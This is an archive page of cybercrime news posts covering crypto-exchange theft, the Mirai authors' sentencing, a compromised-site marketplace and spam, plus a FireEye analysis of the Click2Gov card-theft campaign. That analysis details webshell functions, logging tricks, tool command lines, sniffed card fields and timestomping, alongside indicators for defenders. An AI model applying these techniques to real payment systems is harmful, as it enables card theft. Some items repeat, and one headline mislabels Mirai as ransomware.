Category Archives: Cybercrime

Security Affairs: Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange

Cybercriminals have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from the Japanese digital currency exchange Zaif exchange.

According to the Tech Bureau Corp., a Japanese cryptocurrency firm, hackers have compromised its Zaif exchange and have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies, including Bitcoin, Monacoin, and Bitcoin Cash.

The stole digital currencies included roughly 2.2 billion yen belonged to Tech Bureau and 4.5 billion belonged to its clients.

The hacked have taked the control of the exchange for a couple of hours on Sept. 14, and illegally transferred coins form the “hot wallet” of the exchange to wallets under their control.

“Japanese cryptocurrency firm Tech Bureau Corp said about $60 million in digital currencies were stolen from its exchange, highlighting the industry’s vulnerability despite recent efforts by authorities to make it more secure.” reported the Reuters.

Three days later, operators at the exchange noticed server problems and publicly disclosed the hack on Sept. 18.

The Tech Bureau took offline the exchange and sold to Fisco Ltd the majority ownership for a 5 billion yen ($44.59 million) investment that would be used to replace the digital currencies stolen from client accounts.

“Documents seen by Reuters on Thursday showed Japan’s Financial Services Agency would conduct emergency checks on cryptocurrency exchange operators’ management of customer assets, following the theft. FSA officials were not immediately available for comment.” continues the Reuters.

This is the second hack suffered by a Japan’s crypto exchange this year, earlier January  Japan-based digital exchange Coincheck was hacked and crooks stole$530 million in digital coins.

Earlier this year, a problem at the Zaif exchange allowed some people to buy cryptocurrencies without paying.

Japan is considered a global leaked in cryptocurrency technologies, the Bitcoin could be used for payment in the country since April 2017 major retailers accept this kind of payments.

Experts believe that the cyber heist will affect the FSA’s ongoing regulatory review of the cryptocurrency industry.

Last year Japan became the first country to regulate cryptocurrency exchanges, they have to register with FSA and required reporting and other responsibilities.

Anyway, the incidents demonstrate that the level of security of exchanges has to be improved.

Pierluigi Paganini

(Security Affairs – Zaif exchange, hacking)

The post Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange appeared first on Security Affairs.



Security Affairs

Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange

Cybercriminals have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from the Japanese digital currency exchange Zaif exchange.

According to the Tech Bureau Corp., a Japanese cryptocurrency firm, hackers have compromised its Zaif exchange and have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies, including Bitcoin, Monacoin, and Bitcoin Cash.

The stole digital currencies included roughly 2.2 billion yen belonged to Tech Bureau and 4.5 billion belonged to its clients.

The hacked have taked the control of the exchange for a couple of hours on Sept. 14, and illegally transferred coins form the “hot wallet” of the exchange to wallets under their control.

“Japanese cryptocurrency firm Tech Bureau Corp said about $60 million in digital currencies were stolen from its exchange, highlighting the industry’s vulnerability despite recent efforts by authorities to make it more secure.” reported the Reuters.

Three days later, operators at the exchange noticed server problems and publicly disclosed the hack on Sept. 18.

The Tech Bureau took offline the exchange and sold to Fisco Ltd the majority ownership for a 5 billion yen ($44.59 million) investment that would be used to replace the digital currencies stolen from client accounts.

“Documents seen by Reuters on Thursday showed Japan’s Financial Services Agency would conduct emergency checks on cryptocurrency exchange operators’ management of customer assets, following the theft. FSA officials were not immediately available for comment.” continues the Reuters.

This is the second hack suffered by a Japan’s crypto exchange this year, earlier January  Japan-based digital exchange Coincheck was hacked and crooks stole$530 million in digital coins.

Earlier this year, a problem at the Zaif exchange allowed some people to buy cryptocurrencies without paying.

Japan is considered a global leaked in cryptocurrency technologies, the Bitcoin could be used for payment in the country since April 2017 major retailers accept this kind of payments.

Experts believe that the cyber heist will affect the FSA’s ongoing regulatory review of the cryptocurrency industry.

Last year Japan became the first country to regulate cryptocurrency exchanges, they have to register with FSA and required reporting and other responsibilities.

Anyway, the incidents demonstrate that the level of security of exchanges has to be improved.

Pierluigi Paganini

(Security Affairs – Zaif exchange, hacking)

The post Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange appeared first on Security Affairs.

Why voice fraud rates continue to rise with no signs of slowing down

Pindrop released its annual report detailing developments in fraud, the future of voice and the impact to customer service across various industries. In the report, Pindrop reveals the rate of voice fraud climbed over 350 percent from 2013 through 2017, with no signs of slowing down. Additionally, between 2016 and 2017, overall voice channel fraud increased by 47 percent, or one in every 638 calls. The year-over-year increase can be attributed to several causes, including … More

The post Why voice fraud rates continue to rise with no signs of slowing down appeared first on Help Net Security.

US authorities Have Pardoned Authors of Mirai Ransomware in Return For Government “Cooperation”

The authors of the Mirai botnet have been pardoned and have avoided jail since they have helped the FBI in

US authorities Have Pardoned Authors of Mirai Ransomware in Return For Government “Cooperation” on Latest Hacking News.

Mirai botnet masterminds helping FBI to avoid jail time

Mirai botnet creators avoid prison time by assisting FBI as part of their sentencing

Remember the three young hackers who were sentenced in December last year for creating and spreading Mirai botnet that took over about 500,000 IoT devices and caused a DDoS attack?

The U.S. Department of Justice (DOJ) on Tuesday sentenced all the three men, Paras Jha, Josiah White, and Dalton Norman, all aged in their 20s, to just five years of probation—no prison time. The decision was announced after U.S. prosecutors said that the three men had provided “extensive” and “exceptional” assistance to the U.S. Federal Bureau of Investigation (FBI) in several cybersecurity matters.

The trio will also have to serve 2500 hours of community service and need to pay US$127,000 (A$175,000) in restitution each. Additionally, the trio voluntarily surrendered significant amounts of cryptocurrency seized during the investigation into their activities, the DOJ said.

“By working with the FBI, the defendants assisted in thwarting potentially devastating cyber attacks and developed concrete strategies for mitigating new attack methods,” US attorneys said in a motion filed Sept. 11. “The information provided by the defendants has been used by members of the cybersecurity community to safeguard US systems and the Internet as a whole.”

For those unaware, Jha, White and Norman had created Mirai botnet originally to take down rival Minecraft servers with distributed denial-of-service attacks (DDoS). The trio used the botnet for their own criminal activities and leased it to others. But after noticing its strength, Mirai was released into the wild on a hacker forum, the DoJ said. Since then, other criminal actors have used Mirai variants in a variety of other attacks.

As a result, the Mirai botnet was used in a massive cyberattack in October 2016 against DNS service Dyn, an internet company that directs traffic on the web, which interrupted access to dozens of websites across the United States and Europe including ones run by Twitter, PayPal Holdings, and Spotify.

The three also admitted to having developed a second piece of malware that attacked IoT devices such as wireless cameras, routers, and digital video recorders and joined them into a botnet. That botnet compromised over 100,000 devices in the U.S., and was used by the trio primarily in advertising fraud, including “clickfraud,” a type of Internet-based scheme that makes it appear that a real user has “clicked” on an advertisement for the purpose of artificially generating revenue.

“Cybercrime is a worldwide epidemic that reaches many Alaskans,” said U.S. Attorney Bryan Schroder. “The perpetrators count on being technologically one step ahead of law enforcement officials. The plea agreement with the young offenders, in this case, was a unique opportunity for law enforcement officers, and will give FBI investigators the knowledge and tools they need to stay ahead of cybercriminals around the world.”

“The sentences announced today would not have been possible without the cooperation of our partners in international law enforcement and the private sector,” said Special Agent in Charge of FBI’s Anchorage Field Office, Jeffery Peterson.

“The FBI is committed to strengthening those relationships and finding innovative ways to counter cybercrime. Cybercriminals often develop their technical skills at a young age. This case demonstrates our commitment to hold criminals accountable while encouraging offenders to choose a different path to apply their skills.”

Jha, White, and Norman who were behind the Mirai botnet had pleaded guilty last December and were able to stay out of jail by co-operating with the FBI on cybercrime and security matters.

The court’s documents state that the trio has cooperated with the FBI for more than a year and that they will continue to work with the FBI on cybercrime and cybersecurity matters.

The post Mirai botnet masterminds helping FBI to avoid jail time appeared first on TechWorm.

New Magecart victims ABS-CBN and Newegg are just the tip of the iceberg

With the Magecart attackers compromising web shops left and right, online shopping is becoming a risky proposition. After Ticketmaster, British Airways and Feedify, two new Magecart victims have been identified: the broadcasting giant ABS-CBN and online retailer Newegg. Compromised shops Security researcher Willem de Groot flagged the ABS-CBN compromise a few days ago and he believes the attackers added the payment card skimming script on or before August 16th. RiskIQ and Volexity researchers shared details … More

The post New Magecart victims ABS-CBN and Newegg are just the tip of the iceberg appeared first on Help Net Security.

Manipulation tactics that you fall for in phishing attacks

It’s 6 p.m. on a Friday. Just as you finish packing up for the day, an email from your boss pops up on your phone asking why an urgent payment didn’t go out earlier in the week. He’s tied up in a business dinner, so he needs you to wire payment to a specific vendor immediately and send him a confirmation email here once you’ve done so. Eager to help (and get out of the … More

The post Manipulation tactics that you fall for in phishing attacks appeared first on Help Net Security.

Security Affairs: Access to over 3,000 compromised sites sold on Russian black marketplace MagBo

Security experts at Flashpoint discovered the availability of the access to over 3,000 compromised sites sold on Russian black marketplace MagBo

A new report published by researchers at Flashpoint revealed the availability on an underground hacking forum for Russian-speaking users of access to over 3,000 breached websites.

“Access to approximately 3,000 breached websites has been discovered for sale on a Russian-speaking underground marketplace called MagBo. Access to some of the sites is selling for as low as 50 cents (USD).” reads the report published by Flashpoint.

The earliest advertisements for the MagBo black marketplace were posted in March to a top-tier Russian-language hacking and malware forum. According to the advertising, sellers are offering access to websites that were breached via, PHP shell access, Hosting control access, Domain control access, File Transfer Protocol (FTP) access, Secure Socket Shell (SSH) access, Admin panel access, and Database or Structured Query Language (SQL) access.

Most of the compromised websites are e-commerce sites, but crooks also offered access to websites of organizations in healthcare, legal, education and insurance industries and belonging to government agencies.

According to the experts, most of the compromised servers are from U.S., Russian, or German hosting services. The company reported its findings to law enforcement that are notifying victims.

Magbo compromised servers

Experts found a dozen of vendors on the MagBo black marketplace and hundreds of buyers participate in auctions in order to gain access to breached sites, databases, and administrator panels.

Accesses to compromised websites are precious commodities in the cybercrime underground, crooks can use them to carry out a broad range of illicit activities.

Illicit access to compromised or backdoored sites and databases is used by criminals for a number of activities, ranging from spam campaigns, to fraud, or cryptocurrency mining.” continues the report.

“These compromises have also been used to gain access to corporate networks. This could potentially allow actors to access proprietary internal documents or resources, as well as entry points through which they can drop various malicious payloads. The types of vulnerabilities present and the ways in which they can be exploited depend on the threat actor’s specific capability, motivation, targeting, and goals.”

Sellers are also offering different privilege levels, in some cases they provide “full access permissions” to the compromised sites,  other levels are “abilities to edit content,” and “add your content.”

The prices for compromised websites range from $0.50 USD up to $1,000 USD per access, depending on a website ranking listing various host parameters.

Magbo compromised servers prices.png

High-value targets would have higher prices, for example, to inject payment card sniffers, lower ranking sites are usually used for cryptocurrency mining or spam campaign.

The sellers also offer stolen photocopies of national documents for identity fraud, breached payment wallet access, compromised social media accounts, and Bitcoin mixer or tumbler services.

Pierluigi Paganini

(Security Affairs – MagBo, Darkweb)

The post Access to over 3,000 compromised sites sold on Russian black marketplace MagBo appeared first on Security Affairs.



Security Affairs

Access to over 3,000 compromised sites sold on Russian black marketplace MagBo

Security experts at Flashpoint discovered the availability of the access to over 3,000 compromised sites sold on Russian black marketplace MagBo

A new report published by researchers at Flashpoint revealed the availability on an underground hacking forum for Russian-speaking users of access to over 3,000 breached websites.

“Access to approximately 3,000 breached websites has been discovered for sale on a Russian-speaking underground marketplace called MagBo. Access to some of the sites is selling for as low as 50 cents (USD).” reads the report published by Flashpoint.

The earliest advertisements for the MagBo black marketplace were posted in March to a top-tier Russian-language hacking and malware forum. According to the advertising, sellers are offering access to websites that were breached via, PHP shell access, Hosting control access, Domain control access, File Transfer Protocol (FTP) access, Secure Socket Shell (SSH) access, Admin panel access, and Database or Structured Query Language (SQL) access.

Most of the compromised websites are e-commerce sites, but crooks also offered access to websites of organizations in healthcare, legal, education and insurance industries and belonging to government agencies.

According to the experts, most of the compromised servers are from U.S., Russian, or German hosting services. The company reported its findings to law enforcement that are notifying victims.

Magbo compromised servers

Experts found a dozen of vendors on the MagBo black marketplace and hundreds of buyers participate in auctions in order to gain access to breached sites, databases, and administrator panels.

Accesses to compromised websites are precious commodities in the cybercrime underground, crooks can use them to carry out a broad range of illicit activities.

Illicit access to compromised or backdoored sites and databases is used by criminals for a number of activities, ranging from spam campaigns, to fraud, or cryptocurrency mining.” continues the report.

“These compromises have also been used to gain access to corporate networks. This could potentially allow actors to access proprietary internal documents or resources, as well as entry points through which they can drop various malicious payloads. The types of vulnerabilities present and the ways in which they can be exploited depend on the threat actor’s specific capability, motivation, targeting, and goals.”

Sellers are also offering different privilege levels, in some cases they provide “full access permissions” to the compromised sites,  other levels are “abilities to edit content,” and “add your content.”

The prices for compromised websites range from $0.50 USD up to $1,000 USD per access, depending on a website ranking listing various host parameters.

Magbo compromised servers prices.png

High-value targets would have higher prices, for example, to inject payment card sniffers, lower ranking sites are usually used for cryptocurrency mining or spam campaign.

The sellers also offer stolen photocopies of national documents for identity fraud, breached payment wallet access, compromised social media accounts, and Bitcoin mixer or tumbler services.

Pierluigi Paganini

(Security Affairs – MagBo, Darkweb)

The post Access to over 3,000 compromised sites sold on Russian black marketplace MagBo appeared first on Security Affairs.

SecurityWeek RSS Feed: Click2Gov Attacks on U.S. Cities Attributed to Previously Unknown Group

A previously unknown financially motivated threat group is believed to be behind a series of attacks whose goal was to obtain payment card data from U.S. cities relying on Click2Gov software for utility bill payments.

read more



SecurityWeek RSS Feed

A month of giveaway spam on Twitter

We’ve observed a low level spam campaign working its way through Twitter, with just under 2,000 posts visible on public search since September 1.

giveaway posts

Click to enlarge

The posts promote what appears to be CBD oil. For those who don’t know (And I was one of them—still not sure if this oil is supposed to be inhaled or consumed, but anyway), CBD is short for Cannabidiol, which is a chemical found in cannabis thought to have pain-relieving properties. It is often distilled into oil that can be used in many different ways for various ailments.

The posts follow one of two formats. The first is a large image splash attached to each Tweet:

Twitter post with image

Click to enlarge

It says:

Have you entered into the giveaway yet for a bottle of [product name]?

They are giving it away for FREE

Follow these simple steps:
Step 1: RE-TWEET this post!
Step 2: Click the “Link” below to get your FREE [product name] for the last step!

The second post format we’ve seen is just text with a referral link:

Twitter posts, text only

Click to enlarge

In both cases, the Tweets lead the curious clicker to a site located at

cbdhive(dot)com

This website’s Whois data is listed as domains by proxy, and it offers an email sign up for users to be the “first to know” about…well, no idea. It doesn’t say. I assumed the product was some sort of energy boost tablet, or maybe some kind of juice, and only learned of the medicinal oil connection after several bouts of Googling. All the visitor knows at this point is he has to sign up for something via email.

frontpage of site

Click to enlarge

Once an email address has been handed over, the visitor will be taken to a second page that claims to offer various bundles depending on how many friends make use of the referral/sign-up links. The options available are sharing it via Facebook, Twitter, and email.

post sign up...

Click to enlarge

If you refer five friends, you get one month of free supplies. Ten friends, two months. If you can summon 50 friends, then they claim you’ll receive a full year’s supply.

On our sign-up page, we were told “one friends [sic] have joined…keep checking.”

I don’t know who that friend is, because I certainly didn’t invite anyone (much less have them join).

We haven’t seen any evidence of the posts being automated, so it’s likely people are firing them off manually in the hopes of a freebie or 12.

I can’t say we advise jumping on the free stuff bandwagon; it’s never actually certain if the people participating will receive their desired games, ringtones, or other gifts. In this case, there’s also zero information we can see on the site about what the product is, what it does, how you use it, or if it’s even allowed in whatever region you happen to live.

Factoring CBD into the picture further complicates the matter because CBD is only legal in certain regions (globally), and under certain conditions. For example, CBD is legal in all 50 US states if it’s derived from the hemp plant. But if derived from marijuana, it’s legal in only eight US states. If prescribed by a doctor, it’s legal in 46 states. That’s not confusing at all.

Same deal for shipping, come to think of it. Is it targeted to one area only? Is International shipping possible with CBD?

I have no idea, and most likely neither does anyone else firing the links everywhere.

Always be cautious around sets of identical posts promising you free gifts in return for performing specific tasks. Most of the time, you’re doing little more than acting as free brand promotion for someone else’s SEO team taking the day off. I’m all for boosting the brand and increasing the verticals, but that’s taking things a little too far.

The post A month of giveaway spam on Twitter appeared first on Malwarebytes Labs.

Click It Up: Targeting Local Government Payment Portals

FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.

On June 15, 2018, Superion released a statement describing their proactive notification to affected customers, work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.

Mandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.

Attack Overview

The first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).

SJavaWebManage Webshell

It is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle Web Logic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the publicly available JavaServer Pages (JSP) webshell SJavaWebManage to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.


Figure 1: Sample SJavaWebManage interface

  • EnvsInfo: Displays information about the Java runtime, Tomcat version, and other information about the environment.
  • FileManager: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.
  • CMDS: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.
  • DBManage: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.

The differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.

The attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.

FIREALARM

Using interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.

FIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments; Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If the log files exists, FIREALARM copies the MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:

  • medium.accountNumber
  • medium.cvv2
  • medium.expirationDate.year
  • medium.expirationDate.month
  • medium.firstName
  • medium.lastName
  • medium.middleInitial
  • medium.contact.address1
  • medium.contact.address2
  • medium.contact.city
  • medium.contact.state
  • medium.contact.zip.code

This data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\temp\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.


Figure 2: FIREALARM workflow

  1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.
  2. Attacker launches cmd prompt via webshell.
  3. Attacker runs FIREALARM with parameters.
  4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with orginal times.
  5. THN1080.tmp is deleted.

SPOTLIGHT

Later, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service.  When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.

SPOTLIGHT accepts two command line arguments:

  • gplcsvc.exe -i  Creates a new service named gplcsvc with the display name Group Policy Service
  • gplcsvc.exe -u  Stops and deletes the service named gplcsvc

Upon installation, SPOTLIGHT will monitor two paths on the infected host every hour:

  1. C:\bea\c2gdomain\applications\Click2GovCX\scripts\validator.jsp
  2. C:\bea\c2gdomain\applications\ePortalLocalService\axis2-web\RightFrame.jsp

If either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.

Additionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs – the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:

  • <op:AccountNum>
  • <op:CSC>
  • <op:ExpDate>
  • <op:FirstName>
  • <op:LastName>
  • <op:MInitial>
  • <op:Street1>
  • <op:Street2>
  • <op:City>
  • <op:State>
  • <op:PostalCode>

The contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\windows\temp\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host’s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.


Figure 3: SPOTLIGHT workflow

  1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.
  2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.
  3. A user accesses Click2Gov module to make a payment.
  4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.
  5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.
  6. Attacker exfiltrates opt.log file.

Attribution

Based on the available campaign information, the attacker doesn’t align with any financially motivated threat groups currently tracked by FireEye. The attacker’s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application.  Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker.  

While it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:

  • Ability to locate Click2Gov installations and identify exploitable vulnerabilities.
  • Ability to craft or reuse an exploit to penetrate the target organization’s network environment.
  • Basic JSP programming skills.
  • Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.
  • Proficient C/C++ programming skills.
  • General awareness of operational security.
  • Ability to monetize stolen payment card information.

Conclusion

In addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications.  Another best practice is to ensure any web service accounts run at least privilege.

Although the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.

Detection

FireEye’s Adversary Pursuit Team from Technical Operations & Reverse Engineering – Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting a nation-state or financial gains intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.

FireEye detects the malware documented in this blog post as the following:

  • FE_Tool_Win32_FIREALARM_1
  • FE_Trojan_Win64_SPOTLIGHT_1
  • FE_Webshell_JSP_SJavaWebManage_1
  • Webshell.JSP.SJavaWebManage

Indicators of Compromise (MD5)

SJavaWebManage

  • 91eaca79943c972cb2ca7ee0e462922c          
  • 80f8a487314a9573ab7f9cb232ab1642         
  • cc155b8cd261a6ed33f264e710ce300e           (Publicly available version)

FIREALARM

  • e2c2d8bad36ac3e446797c485ce8b394

SPOTLIGHT

  • d70068de37d39a7a01699c99cdb7fa2b
  • 1300d1f87b73d953e20e25fdf8373c85
  • 3bca4c659138e769157f49942824b61f

Bogus finance apps on Google Play target users worldwide

ESET researchers have discovered malicious apps impersonating various financial services and the Austrian cryptocurrency exchange Bitpanda on Google Play. The fake apps Uploaded to Google’s official app store in June 2018 and collectively downloaded and installed over a thousand times, upon launch the apps would immediately request the user to enter credit card details and/or login credentials to the targeted bank or service. The entered information would then be sent to the attacker’s server, and … More

The post Bogus finance apps on Google Play target users worldwide appeared first on Help Net Security.

Mirai authors avoid the jail by helping US authorities in other investigations

Three men who admitted to being the authors of the Mirai botnet avoided the jail after helping the FBI in other cybercrime investigations.

I’m following the evolution of Mirai botnet since MalwareMustDie shared with me the findings of its investigation in August 2016.

Now three individuals who admitted to being the authors of the infamous botnet avoided the jail after helping feds in another cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of an international joint cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms, including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes online with the moniker “Anna-senpai” leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making hard the attribution of the attacks.

Jha also pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet. According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

The Mirai case was investigated by the FBI Field Office in Anchorage, and the Chief U.S. District Judge in Alaska sentenced the men.

“U.S. Attorney Bryan Schroder announced today that three defendants have been sentenced for their roles in creating and operating two botnets, which targeted “Internet of Things” (IoT) devices.  Paras Jha, 22, of Fanwood, New Jersey; Josiah White, 21, of Washington, Pennsylvania; and Dalton Norman, 22, of Metairie, Louisiana, were sentenced today by Chief U.S. District Judge Timothy M. Burgess.” states the press release published by the DoJ.

“On Dec. 8, 2017, Jha, White, and Norman pleaded guilty to criminal Informations in the District of Alaska charging them each with conspiracy to violate the Computer Fraud & Abuse Act in operating the Mirai Botnet.  Jha and Norman also pleaded guilty to two counts each of the same charge, one in relation to the Mirai botnet and the other in relation to the Clickfraud botnet.”

On Tuesday, the DoJ revealed on Tuesday that each of the men was sentenced to five years of probation and 2,500 hours of community service.

The judges required them to repay $127,000, and they have voluntarily handed over huge amounts of cryptocurrency that the authorities seized as part of the investigation on the botnet.

mirai

The three men have “cooperated extensively” with the authorities helping the FBI on complex cybercrime investigations before the sentence. The trio will continue to offer their support to the feds.

“After cooperating extensively with the FBI, Jha, White, and Norman were each sentenced to serve a five-year period of probation, 2,500 hours of community service, ordered to pay restitution in the amount of $127,000, and have voluntarily abandoned significant amounts of cryptocurrency seized during the course of the investigation.” continues the press release.

” As part of their sentences, Jha, White, and Norman must continue to cooperate with the FBI on cybercrime and cybersecurity matters, as well as continued cooperation with and assistance to law enforcement and the broader research community.”

Pierluigi Paganini

(Security Affairs – Mirai, botnet)

The post Mirai authors avoid the jail by helping US authorities in other investigations appeared first on Security Affairs.

Security Affairs: Mirai authors avoid the jail by helping US authorities in other investigations

Three men who admitted to being the authors of the Mirai botnet avoided the jail after helping the FBI in other cybercrime investigations.

I’m following the evolution of Mirai botnet since MalwareMustDie shared with me the findings of its investigation in August 2016.

Now three individuals who admitted to being the authors of the infamous botnet avoided the jail after helping feds in another cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of an international joint cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms, including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes online with the moniker “Anna-senpai” leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making hard the attribution of the attacks.

Jha also pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet. According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

The Mirai case was investigated by the FBI Field Office in Anchorage, and the Chief U.S. District Judge in Alaska sentenced the men.

“U.S. Attorney Bryan Schroder announced today that three defendants have been sentenced for their roles in creating and operating two botnets, which targeted “Internet of Things” (IoT) devices.  Paras Jha, 22, of Fanwood, New Jersey; Josiah White, 21, of Washington, Pennsylvania; and Dalton Norman, 22, of Metairie, Louisiana, were sentenced today by Chief U.S. District Judge Timothy M. Burgess.” states the press release published by the DoJ.

“On Dec. 8, 2017, Jha, White, and Norman pleaded guilty to criminal Informations in the District of Alaska charging them each with conspiracy to violate the Computer Fraud & Abuse Act in operating the Mirai Botnet.  Jha and Norman also pleaded guilty to two counts each of the same charge, one in relation to the Mirai botnet and the other in relation to the Clickfraud botnet.”

